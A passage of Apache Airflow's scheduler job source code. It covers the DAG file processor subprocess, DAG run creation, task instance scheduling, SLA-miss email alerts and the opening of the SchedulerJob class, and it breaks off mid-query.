# pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import ExitStack, redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from itertools import groupby
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, DefaultDict, Dict, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm import load_only
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.operators.dummy_operator import DummyOperator
from airflow.serialization.serialized_objects import SerializedDAG
from airflow.stats import Stats
from airflow.ti_deps.dep_context import DepContext
from airflow.ti_deps.dependencies_deps import SCHEDULED_DEPS
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, FailureCallbackRequest, SimpleDagBag,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import provide_session
from airflow.utils.sqlalchemy import skip_locked
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
failure_callback_requests: List[FailureCallbackRequest]
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._failure_callback_requests = failure_callback_requests
# The process that was launched to process the given .
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of Scheduler.process_file(file_path).
self._result: Optional[Tuple[List[dict], int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
failure_callback_requests: List[FailureCallbackRequest]
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: list[airflow.utils.dag_processing.FailureCallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with ExitStack() as exit_stack:
exit_stack.enter_context(redirect_stdout(StreamLogWriter(log, logging.INFO))) # type: ignore
exit_stack.enter_context(redirect_stderr(StreamLogWriter(log, logging.WARN))) # type: ignore
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[List[dict], int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
failure_callback_requests=failure_callback_requests,
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self) -> None:
"""
Launch the process and start processing the DAG.
"""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
self._parent_channel, _child_channel = context.Pipe()
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
"DagFileProcessor{}".format(self._instance_id),
self._failure_callback_requests
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
def kill(self) -> None:
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[List[dict], int]]:
"""
:return: result of running SchedulerJob.process_file()
:rtype: Optional[Tuple[List[dict], int]]
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis: List[TI] = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not isinstance(task.sla, timedelta):
continue
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas: List[SlaMiss] = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
# pylint: disable=too-many-return-statements,too-many-branches
@provide_session
def create_dag_run(
self,
dag: DAG,
dag_runs: Optional[List[DagRun]] = None,
session: Session = None,
) -> Optional[DagRun]:
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
# pylint: disable=too-many-nested-blocks
if not dag.schedule_interval:
return None
active_runs: List[DagRun]
if dag_runs is None:
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
else:
active_runs = [
dag_run
for dag_run in dag_runs
if not dag_run.external_trigger
]
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return None
timed_out_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timed_out_runs += 1
session.commit()
if len(active_runs) - timed_out_runs >= dag.max_active_runs:
return None
# this query should be replaced by find dagrun
last_scheduled_run: Optional[datetime.datetime] = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
DagRun.run_type == DagRunType.SCHEDULED.value
)).scalar()
)
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now or isinstance(dag.schedule_interval, timedelta):
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return None
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
period_end = None
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return None
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = min([t.end_date for t in dag.tasks if t.end_date], default=None)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return None
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
return None
@provide_session
def _process_task_instances(
self, dag: DAG, dag_runs: List[DagRun], session: Session = None
) -> List[TaskInstanceKey]:
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
active_dag_runs = 0
task_instances_list = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if active_dag_runs >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag # type: ignore
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
active_dag_runs += 1
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
return task_instances_list
@provide_session
def _process_dags(self, dags: List[DAG], session: Session = None) -> List[TaskInstanceKey]:
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs (if CHECK_SLAS config enabled).
:param dags: the DAGs from the DagBag to process
:type dags: List[airflow.models.DAG]
:rtype: list[TaskInstance]
:return: A list of generated TaskInstance objects
"""
check_slas: bool = conf.getboolean('core', 'CHECK_SLAS', fallback=True)
use_job_schedule: bool = conf.getboolean('scheduler', 'USE_JOB_SCHEDULE')
# pylint: disable=too-many-nested-blocks
tis_out: List[TaskInstanceKey] = []
dag_ids: List[str] = [dag.dag_id for dag in dags]
dag_runs = DagRun.find(dag_id=dag_ids, state=State.RUNNING, session=session)
# As per the docs of groupby (https://docs.python.org/3/library/itertools.html#itertools.groupby)
# we need to use `list()` otherwise the result will be wrong/incomplete
dag_runs_by_dag_id: Dict[str, List[DagRun]] = {
k: list(v) for k, v in groupby(dag_runs, lambda d: d.dag_id)
}
for dag in dags:
dag_id: str = dag.dag_id
self.log.info("Processing %s", dag_id)
dag_runs_for_dag = dag_runs_by_dag_id.get(dag_id) or []
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag and use_job_schedule:
dag_run = self.create_dag_run(dag, dag_runs=dag_runs_for_dag)
if dag_run:
dag_runs_for_dag.append(dag_run)
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
if dag_runs_for_dag:
tis_out.extend(self._process_task_instances(dag, dag_runs_for_dag))
if check_slas:
self.manage_slas(dag)
return tis_out
def _find_dags_to_process(self, dags: List[DAG]) -> List[DAG]:
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:return: DAGs to process
"""
if self.dag_ids:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids]
return dags
@provide_session
def execute_on_failure_callbacks(
self,
dagbag: DagBag,
failure_callback_requests: List[FailureCallbackRequest],
session: Session = None
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param failure_callback_requests: failure callbacks to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
:param session: DB session.
"""
for request in failure_callback_requests:
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
ti.handle_failure(request.msg, ti.test_mode, ti.get_template_context())
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
session.commit()
@provide_session
def process_file(
self,
file_path: str,
failure_callback_requests: List[FailureCallbackRequest],
pickle_dags: bool = False,
session: Session = None
) -> Tuple[List[dict], int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of serialized_dag dicts that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: a tuple with list of SimpleDags made from the Dags found in the file and
count of import errors.
:rtype: Tuple[List[dict], int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
try:
self.execute_on_failure_callbacks(dagbag, failure_callback_requests)
except Exception: # pylint: disable=broad-except
self.log.exception("Error executing failure callback!")
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
dagbag.sync_to_db()
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
serialized_dags = self._prepare_serialized_dags(unpaused_dags, pickle_dags, session)
dags = self._find_dags_to_process(unpaused_dags)
ti_keys_to_schedule = self._process_dags(dags, session)
self._schedule_task_instances(dagbag, ti_keys_to_schedule, session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return serialized_dags, len(dagbag.import_errors)
@provide_session
def _schedule_task_instances(
self,
dagbag: DagBag,
ti_keys_to_schedule: List[TaskInstanceKey],
session: Session = None
) -> None:
"""
Checks whether the tasks specified by `ti_keys_to_schedule` parameter can be scheduled and
updates the information in the database,
:param dagbag: DagBag
:type dagbag: DagBag
:param ti_keys_to_schedule: List of task instance keys which can be scheduled.
:type ti_keys_to_schedule: list
"""
# Refresh all task instances that will be scheduled
filter_for_tis = TI.filter_for_tis(ti_keys_to_schedule)
refreshed_tis: List[TI] = []
if filter_for_tis is not None:
refreshed_tis = session.query(TI).filter(filter_for_tis).with_for_update().all()
for ti in refreshed_tis:
# Add task to task instance
dag: DAG = dagbag.dags[ti.dag_id]
ti.task = dag.get_task(ti.task_id)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_execute_callback \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
ti.start_date = ti.end_date = timezone.utcnow()
ti.duration = 0
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
@provide_session
def _prepare_serialized_dags(
self, dags: List[DAG], pickle_dags: bool, session: Session = None
) -> List[dict]:
"""
Convert DAGS to SimpleDags. If necessary, it also Pickle the DAGs
:param dags: List of DAGs
:return: List of SimpleDag
:rtype: List[dict]
"""
serialized_dags: List[dict] = []
# Pickle the DAGs (if necessary) and put them into a SimpleDagBag
for dag in dags:
if pickle_dags:
dag.pickle(session)
serialized_dags.append(SerializedDAG.to_dict(dag))
return serialized_dags
class SchedulerJob(BaseJob):  # pylint: disable=too-many-instance-attributes
    """
    This SchedulerJob runs for a specific time interval and schedules the jobs
    that are ready to run. It figures out the latest runs for each
    task and sees if the dependencies for the next schedules are met.
    If so, it creates appropriate TaskInstances and sends run commands to the
    executor. It does this for each task in each DAG and repeats.

    :param dag_id: if specified, only schedule tasks with this DAG ID
    :type dag_id: str
    :param dag_ids: if specified, only schedule tasks with these DAG IDs
    :type dag_ids: list[str]
    :param subdir: directory containing Python files with Airflow DAG
        definitions, or a specific path to a file
    :type subdir: str
    :param num_runs: The number of times to try to schedule each DAG file.
        -1 for unlimited times.
    :type num_runs: int
    :param processor_poll_interval: The number of seconds to wait between
        polls of running processors
    :type processor_poll_interval: int
    :param do_pickle: once a DAG object is obtained by executing the Python
        file, whether to serialize the DAG object to the DB
    :type do_pickle: bool
    """

    # SQLAlchemy single-table-inheritance discriminator for the jobs table.
    __mapper_args__ = {
        'polymorphic_identity': 'SchedulerJob'
    }
    # Seconds between scheduler heartbeats recorded by BaseJob.
    heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')

    def __init__(
            self,
            dag_id: Optional[str] = None,
            dag_ids: Optional[List[str]] = None,
            subdir: str = settings.DAGS_FOLDER,
            num_runs: int = conf.getint('scheduler', 'num_runs'),
            processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
            do_pickle: bool = False,
            log: Any = None,
            *args, **kwargs):
        # for BaseJob compatibility
        self.dag_id = dag_id
        # Merge the single dag_id and the dag_ids list into one filter list.
        self.dag_ids = [dag_id] if dag_id else []
        if dag_ids:
            self.dag_ids.extend(dag_ids)

        self.subdir = subdir

        self.num_runs = num_runs
        self._processor_poll_interval = processor_poll_interval

        self.do_pickle = do_pickle
        super().__init__(*args, **kwargs)

        if log:
            self._log = log

        # Check what SQL backend we use
        sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
        # sqlite/mysql need special row-locking treatment elsewhere in this job.
        self.using_sqlite = sql_conn.startswith('sqlite')
        self.using_mysql = sql_conn.startswith('mysql')

        self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
        # Created lazily in _execute(); None until the scheduler starts.
        self.processor_agent: Optional[DagFileProcessorAgent] = None
def register_exit_signals(self) -> None:
"""
Register signals that stop child processes
"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
    @provide_session
    def _change_state_for_tis_without_dagrun(
        self,
        simple_dag_bag: SimpleDagBag,
        old_states: List[str],
        new_state: str,
        session: Session = None
    ) -> None:
        """
        For all DAG IDs in the SimpleDagBag, look for task instances in the
        old_states and set them to new_state if the corresponding DagRun
        does not exist or exists but is not in the running state. This
        normally should not happen, but it can if the state of DagRuns are
        changed manually.

        :param old_states: examine TaskInstances in this state
        :type old_states: list[airflow.utils.state.State]
        :param new_state: set TaskInstances to this state
        :type new_state: airflow.utils.state.State
        :param simple_dag_bag: TaskInstances associated with DAGs in the
            simple_dag_bag and with states in the old_states will be examined
        :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
        """
        tis_changed = 0
        # TIs in one of old_states whose DagRun is either missing (outer join
        # produced NULL) or exists but is not RUNNING.
        query = session \
            .query(models.TaskInstance) \
            .outerjoin(models.DagRun, and_(
                models.TaskInstance.dag_id == models.DagRun.dag_id,
                models.TaskInstance.execution_date == models.DagRun.execution_date)) \
